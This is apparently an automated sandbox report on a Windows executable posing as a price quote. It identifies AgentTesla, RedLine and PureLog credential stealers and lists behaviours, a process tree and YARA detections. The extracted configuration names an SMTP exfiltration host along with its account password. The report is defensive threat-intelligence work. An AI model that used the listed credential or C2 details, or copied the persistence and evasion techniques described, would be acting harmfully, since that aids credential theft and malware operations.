Edit tour

Windows Analysis Report
F#U0130YAT TEKL#U0130F.exe

Overview

General Information

Sample name:	F#U0130YAT TEKL#U0130F.exe renamed because original name is a hash value
Original sample name:	FYAT TEKLF.exe
Analysis ID:	1430788
MD5:	47cc3bb8bb0427d4ce5da71c2cf3702f
SHA1:	cb11ece89c4bb3cb337a32107af9504ed7deb89a
SHA256:	04d2e21d12836aeb42dea69f39783165668427397987d8ce55c94765effb844b
Tags:	exegeoTUR
Infos:

Detection

AgentTesla, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

F#U0130YAT TEKL#U0130F.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe" MD5: 47CC3BB8BB0427D4CE5DA71C2CF3702F)

name.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe" MD5: 38F208E435D774A275ADA42C57F332FD)

RegSvcs.exe (PID: 4852 cmdline: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 2196 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

name.exe (PID: 6696 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 38F208E435D774A275ADA42C57F332FD)

RegSvcs.exe (PID: 2540 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.aquareklam.com", "Username": "info@aquareklam.com", "Password": "Aqua1923"}

Threatname: RedLine

{"C2 url": ["mail.aquareklam.com"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000B.00000002.4571149713.00000000036CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3837231570.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.4571149713.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000B.00000002.4571149713.00000000036BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3837231570.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40f3d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40faf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41039:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x410cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41135:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x411a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4123d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x412cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40055:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x400c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40151:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x401e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x4024d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x402bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40355:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x403e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Process Memory Space: RegSvcs.exe PID: 4852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4852	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 2540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2540	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.name.exe.3670000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.name.exe.3670000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.name.exe.12a0000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.name.exe.12a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.RegSvcs.exe.2ae0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ae0000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.2ae0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ae0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f13d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f1af:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f239:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f2cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f335:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f3a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f43d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f4cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.2ae0ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ae0ee8.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.2ae0ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ae0ee8.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e255:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e2c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e351:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e3e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e44d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e4bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e555:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e5e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.274f4de.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.274f4de.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.274f4de.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.274f4de.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f13d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f1af:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f239:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f2cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f335:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f3a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f43d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f4cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.3b46458.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3b46458.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.3b46458.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3b46458.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40055:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x8d98d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x400c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x8d9ff:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40151:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x8da89:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x401e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x8db1b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x4024d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x8db85:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x402bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x8dbf7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40355:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x8dc8d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x403e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x8dd1d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 ED 88 44 24 2B 88 44 24 2F B0 56 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.RegSvcs.exe.3b93d90.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3b93d90.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.3b93d90.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3b93d90.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e255:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e2c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e351:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e3e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e44d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e4bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e555:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e5e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.274f4de.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.274f4de.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.274f4de.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.274f4de.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40f3d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40faf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41039:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x410cb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41135:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x411a7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4123d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x412cd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.3b93d90.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3b93d90.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.3b93d90.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3b93d90.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40055:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x400c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40151:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x401e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x4024d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x402bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40355:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x403e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.5240000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5240000.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.5240000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5240000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40055:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x400c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40151:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x401e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x4024d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x402bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40355:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x403e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
